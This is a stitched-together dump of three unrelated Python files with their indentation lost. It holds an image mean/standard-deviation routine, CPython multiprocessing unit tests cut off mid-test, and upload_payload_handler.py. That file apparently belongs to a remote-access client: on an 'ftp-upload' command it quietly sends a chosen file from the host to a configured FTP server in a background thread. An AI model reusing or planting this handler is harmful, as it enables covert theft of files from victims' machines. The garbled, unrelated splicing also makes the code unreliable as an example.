one_worker_file = len(self.file_list) // num_workers
self.channel_num = channel_num
for i in range(num_workers):
start = one_worker_file * i
end = one_worker_file * (
i + 1) if i < num_workers - 1 else len(self.file_list)
t = threading.Thread(
target=self._get_clipped_mean_std,
args=(start, end, clip_min_value, clip_max_value))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
im_mean = np.asarray(self.clipped_im_mean_list)
im_mean = im_mean.sum(axis=0)
im_mean = im_mean / len(self.file_list)
im_std = np.asarray(self.clipped_im_std_list)
im_std = im_std.sum(axis=0)
im_std = im_std / len(self.file_list)
for c in range(channel_num):
clip_pixel_num = 0
pixel_num = sum(im_pixel_info[c].values())
for v, n in im_pixel_info[c].items():
if v < clip_min_value[c] or v > clip_max_value[c]:
clip_pixel_num += n
logging.info("Channel {}, the ratio of pixels to be clipped = {}".
format(c, clip_pixel_num / pixel_num))
logging.info(
"Image mean value: {} Image standard deviation: {} (normalized by (clip_max_value - clip_min_value), arranged in 0-{} channel order).\n".
format(im_mean, im_std, self.channel_num))
|
upload_payload_handler.py | import ftplib
from payloads.absract_payload_handler import AbstractPayloadHandler
from client import settings
from threading import Thread
class FTPUploadPayloadHandler(AbstractPayloadHandler):
@classmethod
def get_platform(cls):
return "cross_platform"
def ftp_upload(self,file_name):
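# Send the local file to the configured FTP server (STOR) and close the session.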
self.myFTP.storbinary('STOR %s' % file_name, open(file_name, 'rb'))
self.myFTP.quit()
def execute_payload(self, data:bytes) -> str:
'''
server_addr,username,password,file=data[1],data[2],data[3],data[4]
'''
try:
data=data.decode("utf-8")
if not len(data.split())==2:
return "Invalid format: ftp-upload file/dir\n"
file_name=data.split()[1]
self.myFTP = ftplib.FTP()
self.myFTP.connect(settings.FTP_SERVER_ADDR,settings.FTP_SERVER_PORT)
self.myFTP.login(settings.FTP_USER,settings.FTP_PASSWORD)
t=Thread(target=self.ftp_upload,args=(file_name,))
t.daemon=True
t.start()
return 'Upload for {} started successfully\n'.format(file_name)
except Exception as e:
return "Command execution unsuccessful: {}\n".format(str(e))
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except Exception:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# This test only applies to the forkserver start method
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 50 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.150)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
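# A minimal illustrative sketch of the lock contract that _TestLock asserts
# below (a sketch only; it is not collected or run by the test runner):
# acquire() returns True, a second non-blocking acquire() returns False
# while the lock is held, and release() returns None. RLock differs in
# that its owner may re-acquire it repeatedly.
def _sketch_lock_contract():
    import multiprocessing
    lock = multiprocessing.Lock()
    assert lock.acquire() is True          # uncontended acquire succeeds
    assert lock.acquire(False) is False    # non-blocking re-acquire fails
    assert lock.release() is None          # release returns None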
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
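# Note on the handshake used by _TestCondition.f below: a worker takes the
# condition, releases `sleeping` so the parent can count how many workers
# are blocked, waits on the condition (optionally with a timeout), and
# releases `woken` on the way out. The parent then reads the semaphore
# values instead of polling shared state.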
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
